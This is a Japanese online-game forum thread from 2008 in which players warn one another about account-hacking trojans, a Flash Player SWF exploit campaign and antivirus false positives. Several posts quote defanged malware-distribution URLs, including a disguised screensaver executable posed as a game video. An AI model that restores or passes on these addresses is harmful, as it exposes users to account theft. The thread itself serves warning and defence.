一応後者の一般人と思しき方にはメッセージは入れたのですが、
こちらからも運営に通報しておきますね。
結局は別人がなりすましてやってるという認識で大丈夫ですよね…?
それにしてもROと関係無い(かもしれない)人のmixi垢まで使うとは…

686 名前:(○口○*)さん:08/05/23 18:11 ID:GLryCDTS0
>>683-684
ありがとう

687 名前:(○口○*)さん:08/05/23 19:06 ID:uqJT7duS0
>>685
http://gemma.mmobbs.com/test/read.cgi/ragnarok/1195956271/632
http://gemma.mmobbs.com/test/read.cgi/ragnarok/1195956271/671
などのようにネトゲトロイ+mixi複合アカハックがある

688 名前:(○口○*)さん:08/05/23 21:43 ID:JcC+RnTB0
WinXPでOnline Armor Personal Firewall Freeを使ってみているのですがGameGuardに引っかかりPCが落ちるのですが
使えるようになる設定等ありますでしょうか?

689 名前:(○口○*)さん:08/05/25 02:11 ID:SWZVGT1b0
avastはROと相性が悪いと聞いたのですが、どうなのでしょう?
変にひっかかる時があり、ずっと回線の問題だと思っていましたが、回線が悪くない時でも起きているみたいです

690 名前:(○口○*)さん:08/05/25 03:01 ID:ilFObR5z0
>>689
ファイルが書き込まれた時のスキャン、定義更新時に、AvastはCPUをかなり占有するらしい。
その結果、ROやnProの動作を遅延させてしまい、カクカク描画や、一定時間止まって一気に動きだす等の
不具合に繋がる模様。この症状は、セキュリティソフトを入れ替える事で改善されたという報告が上がっている。

最近のv4.8以降でもavastで改善されたという報告は上がっていないので、現時点でも、同じ状況なのだろう。

691 名前:(○口○*)さん:08/05/25 03:09 ID:SWZVGT1b0
>一定時間止まって一気に動きだす等
まさにこれですorz
酷いときは1分以上自キャラだけ動けずリログや終了も出来ず死ぬのを眺める羽目になることも…
自動更新は切ってるんですけど、常駐保護だけでも起きるんですね

AVGを入れてみようと思いますが、試用版を30日間以上連続使用するためにはどうすればいいでしょう
avastだと期限切れるたびにアドレス登録してライセンスキーを取得することでまた使えるようになるのですが
AVGだとインストールしなおさなきゃだめでしょうか?

692 名前:(○口○*)さん:08/05/25 03:17 ID:SbReCo1e0
フリー版でよけりゃ日本語版の配信がちょうど開始したとこ。
一応アド張っておくわ。
ttp://www.avgjapan.com/avgfree80-dl.html

試用版に関してはワカンネ。

693 名前:(○口○*)さん:08/05/25 03:19 ID:wtM9uVSB0
そもそも試用版を試用期間以上に使おう、という考え方がアレなんだぜ

694 名前:(○口○*)さん:08/05/25 09:14 ID:pyJ8ukYp0
>avastだと期限切れるたびに
あれは試用版じゃない。

695 名前:(○口○*)さん:08/05/25 11:36 ID:Upww7oGn0
そいつはしようがないな

696 名前:L ★:08/05/26 21:00 ID:???0
www.virustotal.comがNGワードに引っかかっていたようなので、戻しておきました。

697 名前:(○口○*)さん:08/05/26 22:29 ID:cPCoeLoP0
>>696
ありがとうございました。

698 名前:(○口○*)さん:08/05/27 02:40 ID:i53Q2+d/0
深淵の騎士子たんに萌えるスレ8 に投稿されていたもの。
404エラーで検体入手には失敗
削除依頼スレで、ループタグ発見 と出ていたので、偽装jpegだったのかも。

ttp://be-sp■com/deux/ura/src/1211557950655■jpg

699 名前:(○口○*)さん:08/05/27 17:17 ID:6ypcS5tG0
スレ違いならごめん。

VISTA使用なんだけど、デーモンツールをインストールしようと思ったんだ。
でも、VISTAに対応してる最新版にはアドウェアが入っているとか聞いたんだ…
VISTAでデーモン入れてるけどRO(垢ハックとか)問題ないぜ、って同志はいるかな……?

700 名前:(○口○*)さん:08/05/27 17:35 ID:H79uS5Oh0
一緒くたにすなや…

701 名前:(○口○*)さん:08/05/27 18:01 ID:ZGA6k9Rt0
>699
XPだが、最新版のデーモンツール入れてるけど何とも無いぜ。

それにデーモンはインストール時に外す事が出来るし。
それでも裏で入ってるんじゃないかと疑うなら、デーモンは諦めて他のを
使ったほうがいいかも。


というかアドウェアとマルウェアは基本的に別物。
中には度が過ぎてマルウェアやトロイと呼べるものもあるにはあるが
基本は別物。

702 名前:(○口○*)さん:08/05/27 18:44 ID:i53Q2+d/0
アルコール52%にしとけよ

703 名前:(○口○*)さん:08/05/27 21:56 ID:EXK7dC3m0
>>699
スレ違いっていうか、ググれば、「デーモンの中に入っているアドウェアは有害なのか?」みたいな記事がヒットすると思う。
昔調べた記憶があるので。

704 名前:(○口○*)さん:08/05/28 12:29 ID:FYsJth3H0
中華アカウントハッカーのいくつものサーバがswfを吐くようになったのが一昨日くらい。
もしやと思いつつVirusTotal等で完全スルーされたので明言は避けてきたけど、
やっぱりFlashPlayerの脆弱性を使い出した模様。

McAfeeブログ
ttp://www.avertlabs.com/research/blog/index.php/2008/05/27/newsflash-flash-player-blight/
ttp://www.avertlabs.com/research/blog/index.php/2008/05/27/flash-player-exploit-update/

9.0.115までやられるので早急に9.0.124にアップデートしましょう。
YouTubeとかニコニコ動画とかもFlashだからね!

705 名前:(○口○*)さん:08/05/28 12:31 ID:FYsJth3H0
追記。FlashPlayerなのでブラウザに依存しません。

706 名前:(○口○*)さん:08/05/28 12:47 ID:FYsJth3H0
play0nlnieによる実用例
SANS ISC日記
ttp://isc.sans.org/diary.html?storyid=4468

707 名前:(○口○*)さん:08/05/28 12:57 ID:APNFc6Ic0
ブラウザプラグインの為、非Trident系ブラウザ(FireFoxやOperaなど)のユーザーの場合、それらとIEの両方のプラグインを更新すること。
オンラインゲームのパッチクライアントなど、IEコンポーネント部分を使用する事も多いので。

それと併せて、FireFox+NoScriptのような、必要ないサイトでのスクリプト遮断もお薦め。
0dayのような状況でも、被害を未然に食い止められる可能性が出てくるから。

708 名前:(○口○*)さん:08/05/28 13:03 ID:DdNstTAM0
最新バージョン9.0.124にも脆弱性が見つかりました
皆様お気を付け下さいませ

Flash Playerにゼロデイの脆弱性、大規模被害の恐れも
ttp://www.itmedia.co.jp/enterprise/articles/0805/28/news018.html

709 名前:(○口○*)さん:08/05/28 13:08 ID:nUXh2Onw0
ttp://www.itmedia.co.jp/enterprise/articles/0805/28/news018.html
ttp://itpro.nikkeibp.co.jp/article/NEWS/20080528/304425/

>脆弱性が報告されたのはFlash Playerの現行バージョン9.0.124.0
>およびそれ以前のバージョン。Adobeはまだパッチを公開していない。
>米Symantecはこの脆弱性を突いたエクスプロイトが広く出回っているとして、
>グローバルセキュリティ警告システム「ThreatCon」の警戒レベルを引き上げた。

リネージュ資料室でもトップで警告を発してる。
ブラウザ関係ないので、IE使ってないから安全、という考えは通じない。

710 名前:(○口○*)さん:08/05/28 13:26 ID:FYsJth3H0
検体発射済み。
スクリプトを見るとブラウザによってswfを変えるもの、
FlashPlayerのバージョンによってswfを変えるものなど
いろんなのがある。

711 名前:(○口○*)さん:08/05/28 13:37 ID:FYsJth3H0
バージョン判定で9.0.115までの奴しか見かけないから勘違いしたけど
9.0.124でもだめくさいね。

712 名前:(○口○*)さん:08/05/28 15:30 ID:nUXh2Onw0
>710
具体的にどういう手法をやらかしてるんだろう?
罠swfを読み込むようにJavaScriptを記述したhtmlを用意して
それをサイズ0のiframeで読み込ませるとか?

FireFox+NoScriptで安全と判断したサイトのみスクリプトを
動かすように設定してても、そこがSQLインジェクションとかで
攻撃されてたら引っかかる気がするし。

Adobeが対応バージョンをリリースするまでは、FlashPlayerを
アンインストールするのが一番確実かなぁ。
ニコやYouTubeとかの動画サイトの閲覧も出来なくなるし、不便な事
この上ないが……

>米メディアの報道(CNET News.com)によると,ある条件のもとでは、
>ユーザーはマルウエアをホスティングしている中国のサーバーに
>リダイレクトされる。

このうち何割かがネトゲの垢ハクの罠の可能性も十分あるよねぇ……

713 名前:(○口○*)さん:08/05/28 16:00 ID:FYsJth3H0
>>712
設置するサイトはインジェクションしたり
BBSやwikiやblogへ投下などいつものやつ。
既に既存のアハカックサイトのFlash対応も始まっている。

scriptを使うのはブラウザやFlashPlayerのバージョン判定をするもの。
scriptを使わず普通にHTMLでFlashを読ませるサイトもあるので
script止めただけじゃだめっぽ。objectタグやembedタグを無効にするか
Flashそのもの(AciveXコントロールやプラグイン)を無効にするしかない。

半分以上はネトゲアカハックと思われる。

714 名前:(○口○*)さん:08/05/28 16:02 ID:FYsJth3H0
で、怪しいURIは踏まない! と言っても
企業のサイトがインジェクションで食われる昨今、
ソニーとかみたいなFlashまみれのサイトはちょっと踏みたくないな。

715 名前:(○口○*)さん:08/05/28 16:10 ID:APNFc6Ic0
>>712-714
とりあえず、Firefox+NoScriptなら、Flash(やSilverLight)の禁止設定も可能ではある。

ttp://distraid.co.jp/demo/tips_noscript.html
> NoScriptの主な機能としては下記のようなものがあります。
> * JavaScriptやiframe、Flash/SilverLight/Javaなどの有効/無効設定
> * Whitelist(許可サイトリスト)システムにより、上記の機能の可否をサイト毎に設定可能
> * CrossSiteScripting(XSS)対策

WinXP(SP1以降だっけ?)のように、OS標準でFlash Playerプラグインが導入されている例もあるし、ゲームのパッチクライアント自体が
Flashを使用しているようなケースもあったはず。

それとは別に、Flashがインストールされていないとリンク先に飛べないページがあるようなサイトは、アクセシビリティの面から好ましくはないが。

716 名前:(○口○*)さん:08/05/28 16:13 ID:APNFc6Ic0
もう一点。
比較的解りやすいNoScript導入ガイド。
ttp://itpro.nikkeibp.co.jp/article/COLUMN/20080421/299675/

717 名前:(○口○*)さん:08/05/28 16:38 ID:nUXh2Onw0
>713
情報サンクス。

>設置するサイトはインジェクションしたり
>BBSやwikiやblogへ投下などいつものやつ。
エンドユーザー側(と言っていいのか)へは手馴れた普段の手法で行える、と。

>script止めただけじゃだめっぽ。objectタグやembedタグを無効にするか
>Flashそのもの(AciveXコントロールやプラグイン)を無効にするしかない。
こちらも予想通りというか何というか……

>715
全面的に禁止するなら、Flashのプラグインをアンインストールするのと
一緒の事。
信頼して良いサイトをホワイトリストに登録して許可したとしても、そこが
インジェクション攻撃で汚染された場合、被害に合う。

結局、対応版がリリースされるまでは、アンインストール(或いは全面的に
OFF)する以外に安心出来る手段がないという事に、と思ったんだが……

718 名前:(○口○*)さん:08/05/28 16:50 ID:FYsJth3H0
補足。
>エンドユーザー側(と言っていいのか)へは手馴れた普段の手法で行える、と。
FC2ブログハックなどで広まったRealPlayerの脆弱性を使う罠は
スクリプトのみでexeを動かすことができ、rm(RealMedia)などは不要だった。
今回は逆で、スクリプトは不要なかわりに
exeを動かすためのswf(Flash)を作成する必要がある。
もう罠swf生成ツールが出回ってるのかもねぇ。

しかし今回のはやばいな。
FlashPlayerの普及率、RealPlayerの比じゃないよね。

719 名前:(○口○*)さん:08/05/28 18:49 ID:nUXh2Onw0
ttp://japan.cnet.com/news/sec/story/0,2000056024,20374112,00.htm

Symantecが確認したリダイレクト先は dota11■cn だそうな。
最近良く見ると思ったら、Flash絡みだったのね……

ちなみにそこは、まとめ臨時さんやリネ資料室等のhostsには掲載済みの
既知の危険アドレス。

当然他にもリダイレクト先はあるだろうけど、最初にヒットしたのが垢ハック系
だったってのは、なんていうか、複雑。

720 名前:まとめ臨時 ◆kJfhJwdLoM:08/05/28 18:56 ID:8TI8izJo0
どうでもいい憶測ですが…
最近はニコニコ動画を観る為にFlashPlayerは必ず導入するので
セキュリティ対策もしていない一般層が
どこかで感染して被害と言うケースが物凄く増えそうです…。

とりあえず当方はFlashPlayerをアンインストールしました。
Flashがなくても人間生きていける。

>Flashがインストールされていないとリンク先に飛べないページがあるようなサイトは、アクセシビリティの面から好ましくはないが。
715さんの言われるように
最近はFlashを観ないとサイト自体が機能しない所が増えた気がします。
映画とかゲームメーカーとか飲料メーカーとか…。
skipボタンすらないところもあるのでなんともな感じです。
一方で家電メーカーはhtml版とかあるのは気配りだと思いたいところ。


物が物だけにリストを急遽更新しました。
名前を厳密に設定しないといけないと電波を受けたので
今回、ドメイン名をワード検索でかけて
厳密な名前が出てきた分をUPしてみました。
おかしい所があれば突っ込みお願いします。

721 名前:(○口○*)さん:08/05/28 18:56 ID:DdNstTAM0
垢ハックといっても対象がネトゲに限らんからなぁ

722 名前:(○口○*)さん:08/05/28 19:01 ID:MUdZLfkZ0
そういや垢ハックって「フィッシング」に分類される犯罪なのだろうか

723 名前:まとめ臨時 ◆kJfhJwdLoM:08/05/28 19:02 ID:8TI8izJo0
ああ…憶測を書いていることがどうでもいい事で
セキュリティ対策をしていない一般層に対してどうでもいいって事ではないです。

明日はわが身かもしれないと思うと気が気でなくなります。

724 名前:(○口○*)さん:08/05/28 19:13 ID:Edi/4Iln0
swfに埋め込むって事は、極論すれば普通のswfファイルに
罠を埋め込んで、正常に再生させつつも罠を発動させる事が
可能って事?
一昔前のインプラントJPEGみたいに。

もし可能なら、ニコ動とかで再エンコ無しでうpれば、被害が
一瞬にして万単位とかになる気がしたんだが、どうなんだろうか?

725 名前:(○口○*)さん:08/05/28 19:18 ID:FYsJth3H0
>>724
可能だろうね。
アップされる鯖側でスキャンするデーモン作るよりは
Adobeの対応のほうが早そうだなぁ。

726 名前:(○口○*)さん:08/05/28 19:39 ID:OEH89Bar0
>>724を見て慌ててニコ動をWhitelistから削除した(((;゚д゚)))ガクガクブルブル

727 名前:(○口○*)さん:08/05/28 19:57 ID:ZczJkkTg0
アイマス動画に仕込んでニコ厨憤死とかありえそうだな

728 名前:(○口○*)さん:08/05/28 20:03 ID:APNFc6Ic0
>>717
今回のようなケースでは、FlashPlayerのアンインストールでも事足りるけど、平時でも、広告枠のような無用なswfを
抑制する事で、トラフィックやCPU負荷を削減し、快適なブラウジングへのメリットもある。

単に脆弱性避けであれば、非Windows環境でのブラウジングを行えば、大方の罠には掛からないというのもまた事実ではあるが。

>>718
WinXP以降ににバンドル(どうやら初期出荷版からだった模様)されている事からも、PCユーザーの大多数が危険に曝される可能性がある。
ある程度終息するには、WUでのアップデート配布が行われる必要もあるだろう。
Windows自体やIEもそうだけど、ある企業の製品が市場で寡占状態になると、どうしても弊害が出てくる。
Flashは、とうにRealMediaを追い抜いているだろうし、SilverLightに至っては、M$とGoogle関係の一部でしか見掛けたことがない。

>>720
go.jpですら、flvを使用している時代なので。
健常者であるうちはともかく、スクリーンリーダーなどを使用した環境では、今のwebはバリアだらけだという現実があったり。
swfにきっちり代替テキストを埋めこんでいるweb制作者は、まだまだ多いと言えないのが辛いところ。

729 名前:(○口○*)さん:08/05/28 20:55 ID:B+dYf+2K0
何かWUが来ました。(詳細は不明)

730 名前:(○口○*)さん:08/05/28 21:16 ID:B+dYf+2K0
再起動してWUの履歴を確認してみると、

Windows XP 用の更新プログラム (KB932823)
IME が有効になっている Windows XP を実行中のコンピュータに、
Windows Internet Explorer 7 を使用してファイルをダウンロードできない
という問題が修正されます。

だそうで、>>728とは別件のようです。誤報失礼しましたorz
>>728の件なら対応早いなとちょっとドキドキしたのですが・・・

731 名前:(○口○*)さん:08/05/28 21:31 ID:DdNstTAM0
WUってWindowsUpdateですか…。
Flash Palyerは自分で更新しに行かないとダメです。
まだ出てませんがね。

732 名前:(○口○*)さん:08/05/28 21:40 ID:RpkTpr+70
どうやってリダイレクトを仕込ませてるのかが良く分からんね
それさえ分かれば、ニコニコに関しては、うp時にファイルをチェックする機構を盛り込むようにすることで対処できると思うんだ
とりあえず、「この件に関する対応するまでニコニコ動画を利用しません」という旨の問い合わせを送っておくつもりでいる

733 名前:730:08/05/28 21:45 ID:B+dYf+2K0
>>731
いや、それくらいは知っているのですが、
>>728の中段あたりに書いてあることと、WU更新がすごいタイミングで
来たもので・・・ね orz

734 名前:(○口○*)さん:08/05/28 21:48 ID:FYsJth3H0
>>732
swfにhttpどうたらこうたらexeが書いてある
(で、たぶんそれが問答無用で実行される)。
もっともswfから別のswfを呼び出したり
swf自体を圧縮してあったりするので
ぱっと見ではわからない。

735 名前:(○口○*)さん:08/05/28 21:50 ID:DdNstTAM0
>>733
わかりにくい略はやめてねって気持ちだったんだけれど。

736 名前:730:08/05/28 23:11 ID:B+dYf+2K0
>>735
なるほど、失礼しました^^;

737 名前:(○口○*)さん:08/05/28 23:19 ID:SOpzGVdh0
このスレでwindows updateと書かれてるのは13件、WUと書かれてるのは7件あったんだが。

738 名前:(○口○*)さん:08/05/28 23:21 ID:DdNstTAM0
そうですか。

739 名前:(○口○*)さん:08/05/28 23:22 ID:XNzANFoC0
自分が認めない物は全て否定だから

740 名前:(○口○*)さん:08/05/28 23:59 ID:RpkTpr+70
>>734
サンクス
単純にはいかないみたいだね
本家の更新を待つ他無いか・・・

741 名前:(○口○*)さん:08/05/29 00:05 ID:30Sp5mWZ0
>>740
おかげで検体を出すのもちょっと躊躇するんすよ。
あるswfを送っても、それは(swfの仕様の範囲内で)
別のswfを呼ぶためだけの物だったりするんで。
swftoolsでダンプして見てるけどよくわからん。

742 名前:(○口○*)さん:08/05/29 00:16 ID:iukAM2i60
現状のところ、swf見ないようにするほかの対処法はないってことだな……
Adobeのバージョンアップがくるまでは、自衛策としてフラッシュみないこと、と。

743 名前:(○口○*)さん:08/05/29 01:38 ID:30Sp5mWZ0
おおっと、swfに関してはOneCareが意外と早かった。
TrojanDownloader:Win32/Swif.A
TrojanDownloader:Win32/Swif.E
TrojanDownloader:Win32/Swif.G
TrojanDownloader:Win32/Swif.H
もっとも場当たり的な対応でちょっと変わると検知しないかもしれない。
Adobeからな〜んも情報が出ていない時点では
この辺どう検知させるかはアンチウイルスベンダの悩みどころだろうなぁ。

744 名前:(○口○*)さん:08/05/29 01:42 ID:30Sp5mWZ0
ちなみにAdobeのセキュリティチーム(笑)のブログ。
blogs.adobe.com/psirt/
Symantecからいろいろ教えてもらっている最中のようで、
たぶん自分たちのプログラムのどこがまずいか把握できてない。

745 名前:(○口○*)さん:08/05/29 02:33 ID:WyVWDSO20
件のファイルを拾えたのでVTに投げてみたら、こんな感じ

ttp://www.virustotal.com/analisis/2e481c0d11e6780ba6e1627354d3679b
>Result: 1/32 (3.12%)
>Symantec 10 2008.05.28 Downloader.Swif.C

ファイルサイズが140byteの代物だったので、>724の懸念が
当たってるかどうかは不明。

746 名前:(○口○*)さん:08/05/29 03:09 ID:30Sp5mWZ0
VTでは出てこないけどMcAfee AVERTに投げたら
27日朝に「heuristic detection beav-shellcode」と返信来てた(全部じゃないけど)。
パターンでの対応はまだだけど初動は最も早かった気がする。

747 名前:(○口○*)さん:08/05/29 07:15 ID:30Sp5mWZ0
Flashの件。0dayでは無く、9.0.124で対策済みの模様。
ttp://blogs.adobe.com/psirt/2008/05/potential_flash_player_issue_u_1.html
ttp://www.avertlabs.com/research/blog/index.php/2008/05/28/flash-player-exploit-update-2/

748 名前:(○口○*)さん:08/05/29 09:05 ID:FgFD8x0E0
どうも事実関係がはっきりせずあやふやだなあ。

749 名前:(○口○*)さん:08/05/29 09:41 ID:GokvavjX0
WikipediaにもWU→Windows_Update→Microsoft_Updateの誘導があるし、妥当なabbrevだろうよ。
これでわかりにくいというなら、見識が足りないだけじゃないの。

750 名前:(○口○*)さん:08/05/29 09:51 ID:30Sp5mWZ0
その話は終わった。

751 名前:(○口○*)さん:08/05/29 10:09 ID:30Sp5mWZ0
>>748
未パッチと指摘しAdobeとやり取りしていた
SymantecSecurityFocusもRetiredになった。
ttp://www.securityfocus.com/bid/29386

752 名前:(○口○*)さん:08/05/29 11:14 ID:7Yu9gd/G0
えーっと、あんましPCに詳しくないから聞きたいんだけど、
ニコ動にしろYoutubeにしろ、動画ファイル自体はflvファイルだよね?
確かにうpするときはswfだけど。

このとき、flvでもswfに仕込んだ罠は動かせるってわけ?
swfでできるのは知ってるけど、flvでもできるの?

753 名前:(○口○*)さん:08/05/29 12:36 ID:30Sp5mWZ0
JPCERT/CCもJVNも修正されてるね。

いちおう。
FlashPlayerの更新
ttp://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash

754 名前:(○口○*)さん:08/05/29 18:28 ID:TUEyloiu0
人騒がせなニュースだったな。
まあ、用心するに超したことはないんだけれどね。

他の脆弱性と組み合わせて使われるだろうから、
別のゼロデイ攻撃があったときに、こいつをトリガにして
うっかりやられる可能性もあるし。

755 名前:(○口○*)さん:08/05/29 18:42 ID:epZFOGjo0
>>753
この更新入れておけばFlashの脆弱性つかれるのは大丈夫なのかな?
ずっと読んでたけどいまいち分からなかったんだ

756 名前:(○口○*)さん:08/05/29 19:41 ID:30Sp5mWZ0
>>755
うん。

757 名前:(○口○*)さん:08/05/29 21:35 ID:lQv/QGNu0
>>752
落としてみれば分かるが、ニコでswfでうpされたファイルは、そのままswfで落ちてくる
だから利用される可能性はあるんじゃないかな

758 名前:(○口○*)さん:08/05/29 21:58 ID:epZFOGjo0
>>756
ありがとう。
知り合いにも更新勧めておきます

759 名前:(○口○*)さん:08/05/30 09:15 ID:UvM7cIt40
アプリコの殴りアコプリスレに張られていたもの

www■blogplayonlin■com/blog/konline■zip
--->mov000029■wmv■scr

アドレス自体は既知のものだが、直接blogplayonlinや/blogを
見に行くと403が返ってくる罠。


>758
WUと同じように、常に最新のものにしておかないと危険だよ。
最近の各種ソフトのバージョンアップってバグ取りや新機能追加よりも
セキュリティホールの対応が多いし。

760 名前:(○口○*)さん:08/05/30 10:32 ID:G+CMzrDC0
管理板より転記

78 名前:側& ◆2wI/ZkiJho[shiou★yahoo,co,jp] 投稿日:08/05/29(木) 22:58 ID:7LuspO0U0
神速AX (Z47H)
少し前に撮った神速AXの動画ですが、名前を切り取ってアップさせていただきますね。...RO
http://www■blogplayonlin■com■blog■konline■zip

79 名前:& ◆IvlEUwQ0mg[shiou★yahoo,co,jp] 投稿日:08/05/29(木) 22:59 ID:7LuspO0U0
神速AX (Z47H)
少し前に撮った神速AXの動画ですが、名前を切り取ってアップさせていただきますね。...RO
http://www■blogplayonlin■com■blog■konline■zip

761 名前:(○口○*)さん:08/05/30 13:43 ID:OGMzOxkl0
すいません、ニコ動のTop画面を開いたらアバストが反応して、
ログビューアを見たらSWF:CVE-2007-0071 [Expl]と表示されました。
これはウィルスの一種なのでしょうか?
↑の方にニコ動関係でいくつか書いてあったのですが、そちらと関連があるのでしょうか。
ブラウザはIE6SP2を使用しています。

762 名前:(○口○*)さん:08/05/30 14:20 ID:8wsoGNof0
>>761
SWF:CVE-2007-0071 [Expl] ってことは、Flash Player 9.0.115.0以前、
および8.0.39.0以前にある脆弱性を突く変造swfだろうな

Flash Playerのセキュリティ脆弱性に対処するためのアップデート公開
http://www.adobe.com/jp/support/security/bulletins/apsb08-11.html

バージョンアップいってら
http://live27.2ch.net/test/read.cgi/ogame/1211922679/108

763 名前:(○口○*)さん:08/05/30 14:21 ID:DVR6Rh8V0
>>761
この辺かな。とりあえずavast!限定の話らしいからスレの流れとは別物。

ニコニコ動画本スレッド Part592
http://pc11.2ch.net/test/read.cgi/streaming/1212106974/
【ニコ動オワタ?】avastがニコニコ動画からマルウェア検出するようになった件
http://namidame.2ch.net/test/read.cgi/news/1212108815/

764 名前:(○口○*)さん:08/05/30 14:21 ID:SeyaXRFL0
つまり >>724

765 名前:(○口○*)さん:08/05/30 14:43 ID:OGMzOxkl0
レスありがとうございます、Flashのほうは9,0,124,0に更新してきました。
更新後、ニコ動に一度アクセスしてみましたがやはり前回と同じ表示が出ました。

↑で紹介されたスレを見てきましたが、同じような症状に遭われてる方が多いですね。
そちらのスレをこちらと合わせて確認し、様子を見ようと思います。
アドバイスありがとうございました。

766 名前:(○口○*)さん:08/05/30 14:47 ID:8wsoGNof0
>>763 情報ありがと。
というわけで、>>762を一部訂正。

avast!は正常なswfを危険なswfと誤検知する可能性が高い。
Flash Playerを9.0.124.0以降に更新して、avast!の誤検知が修正されるのを待ちましょう。

てとこかな。

767 名前:(○口○*)さん:08/05/31 10:12 ID:KZVZeLGn0
今朝ROを終了した際、avastが疑わしいファイル(ヒューリスティック法?)として
ROフォルダ内GameGuard\dump_wmimmc.sysというファイルが検出されました。
avastの推奨するアクションが無視だったため、無視。
するとavastがメモリ上にウィルスを検出しました。
GameGuardフォルダ内を見てみたところ
dump_wmimmc.sysというファイルは見つかりませんでした(隠しファイル表示をして)
その後、カスペルスキーオンラインスキャナを行いましたがウィルス等は検出されませんでした。
ウィルスが検出されず、GameGuard内に存在していることからnProtect関係だと思われるのですが、
この症状は問題ないとみなしても大丈夫でしょうか?

768 名前:(○口○*)さん:08/05/31 10:38 ID:v2grKBTp0
>817 (○口○*)さん sage New! 08/05/31 04:29 ID:wLDtRYv40
>すいません、ちょっとききたいのですが
>下のようなアドレスを2連投で張られたのですが
>アカハックアドレスでしょうか??
>
>もしアカハクだとまずいので、アドレスは少し消してます
>
>
>RO ハイプリがヒールでゾンビを癒す
>ttp://www■sakerver■com/web/douga/

>819 (○口○*)さん sage 08/05/31 04:36 ID:8UBl8MQY0
>>>817
>ソースチェッカーだと、「※このアドレスは危険URLのひとつです。」と赤字で出る。
>が詳細が出ない。

>821 (○口○*)さん sage 08/05/31 04:53 ID:Gfn+Eg0X0
>とりあえず垢ハックの殆どがドメイン持ってる中国内陸部のURLであることは分かった
>
>>>817のURLは404(?)になってるが同ドメインの他のディレクトリにexeへのリンクがある
>のを確認した

>822 (○口○*)さん sage 08/05/31 05:15 ID:/1d2Ba2tO
>そのヒールでゾンビを癒す、ってやつニコ動で見たんですが・・・それは大丈夫なのかな

>823 (○口○*)さん sage 08/05/31 05:21 ID:Gfn+Eg0X0
>他所の「RO関連だと思われる文章」を一緒に貼り付けるのは良くあること


物質(ものしつ)スレに投稿されていた内容。

769 名前:(○口○*)さん:08/05/31 10:38 ID:v2grKBTp0
>>767
それはnProが一時的に生成して終了時に削除するファイル。
許可をださないとROは起動しなくなる。

770 名前:(○口○*)さん:08/05/31 10:40 ID:v2grKBTp0
あ。メモリ上に〜というのは知らない。多分、危険な手法を使ってるnProだから検知したんだと思うけど
自己責任で判断してくれ。

あと、質問する時は、せめて、ログから検出した名称位は貼り付けてくれよ。

771 名前:(○口○*)さん:08/05/31 12:19 ID:mwdjpAXK0
avastはちょっと誤検知が多いな。

772 名前:(○口○*)さん:08/05/31 12:39 ID:pXlbvISs0
>768
そこ>663から続くレスにもあるが、間違いなくアカハックアドレス。
その時は>675にあるように新種が置かれていた。

見事に物質スレに誤爆してしまったorz

773 名前:(○口○*)さん:08/05/31 13:04 ID:KZVZeLGn0
>>769
解説ありがとうございます。
nproの誤検知のようですね。
ログに関しては以後気をつけます。
ありがとうございました。

774 名前:(○口○*)さん:08/05/31 19:07 ID:0LFYh5Fh0
警察に連絡して5ヶ月くらいたって
癌からメールキタ━━━━(゚∀゚)━━━━!!!!

モスコビアカムバック

嫌がらせか(´;ω;`)

775 名前:(○口○*)さん:08/05/31 19:19 ID:fqQFgC790
警察に何をどう伝えてどれだけやりとりしたのかも書かずそんなこと言われてもチラ裏だろう

776 名前:(○口○*)さん:08/05/31 20:02 ID:v2grKBTp0
>>774
警察に進展具合を問い合わせ
癌に警察に報告済みであることと、調査進展状況を問い合わせ

両方平行してやっとけ

777 名前:(○口○*)さん:08/05/31 23:15 ID:0LFYh5Fh0
>>775
捜査して進展があったら連絡しますっていわれてた状況でした

>>776
さすがに5ヶ月放置はなんかあったかもしれないんで今度電話してみますありがとう

778 名前:(○口○*)さん:08/06/01 02:42 ID:RPe9/W0s0
質問があります
先ほどノートン先生にてスキャンしてたところ今まで検出しなかった
\ragdefender\rdefender.dfdを検出しまた
リスク名はDownloaderでノートンの定義バージョンは2008・05・31・002になってて
リスクの状態が完全に削除しましたになってます(自動で削除)
で、本題ですがこのファイルは削除しても良いのでしょうか?
わかりにくい質問で申し訳ないですがよろしくお願いします

779 名前:(○口○*)さん:08/06/01 03:13 ID:XNoQwqSj0
>>778
nProの一時ファイルっぽい気がするけどよくわからん。
複数のエンジンでオンラインスキャンかけてみれ。

780 名前:まとめ臨時 ◆kJfhJwdLoM:08/06/01 03:28 ID:gR5R6rVp0
>>778
検索をかけてみるとrdefender.dfdは以前の不正対策用ファイルで
現在配布されているクライアントをインストールした場合、
該当フォルダとそのファイルは存在しません。
(今は\RagnarokOnlineのフォルダに
 直接置かれているdfdファイルとGameGuardフォルダがあります)

778さんの使用されているクライアントは
nProが実装されたり変更になったりした時期のものか
それ以前のクライアントのまま使用されていて
不正対策パッチが実装されたりされなかったりで
そのまま使われなくなったものかと思われます。

削除されずデータがそのまま残っていて、
今回の検出に引っかかったのかもしれませんね。

参考 http://ragd.sakura.ne.jp/q_and_a/cbbs.cgi?mode=al2&namber=49286&rev=&no=0&KLOG=158

781 名前:(○口○*)さん:08/06/01 08:41 ID:PhQM5s9f0
散々語りつくされていたりスレ違いだったら恐縮なんですが、質問があります
ネットサーフィンを可能な限り安全にしたいと思い、SandBoxの導入を考えています
ソフトはSandBoxieというものを使おうと思っているのですが、垢ハック系はこれでほぼ防げると考えて良いでしょうか

それと、こちらは垢ハックには直接関係無いかもしれませんが
>Sandboxieの性質上メモリ、ブートセクタ感染などのタイプは対処できない
と紹介されていたサイトのひとつに書いていました

このメモリ、ブートセクタ感染タイプのウイルスというのは具体的にどの様なものなのでしょうか
挙動や性質については調べて分かったのですが、感染経路がいまいち分かりません
例えば垢ハックサイト等で見られる「サイトを開いた瞬間に感染」といった事でも感染する類のタイプでしょうか
それとも、ウイルスが仕込まれたexe等実行ファイルを実行しない限りは感染しないタイプでしょうか?

きちんと把握が出来ていないので、まとまりの無い文章になっているかもしれませんが宜しくお願いします

782 名前:778:08/06/01 09:17 ID:RPe9/W0s0
>>779-780さんありがとうございます
確かにクライアントは昔インストしたタイプです
しかしノートン先生も昔から入れてたのに今回初検出だったので改めて
ゲームに向いてないんだな〜と思いつつ更新申し込んだばかり・・・
どうせなのでカスペ等でオンラインスキャンやクライアントの入れなおししようと思います

783 名前:(○口○*)さん:08/06/01 13:34 ID:t/Q2xJTn0
>781
SandBoxieの存在を知らなかったのでちょっとググって見たが
なんか同じ記事のコピーしかヒットしなかったので、信頼性等に
ついては良く分からない。
スレ住人に利用者が居たら、話聞けるかも。

ただ似たような事やるなら、VMWarePlayer+Ubuntuとかの方が
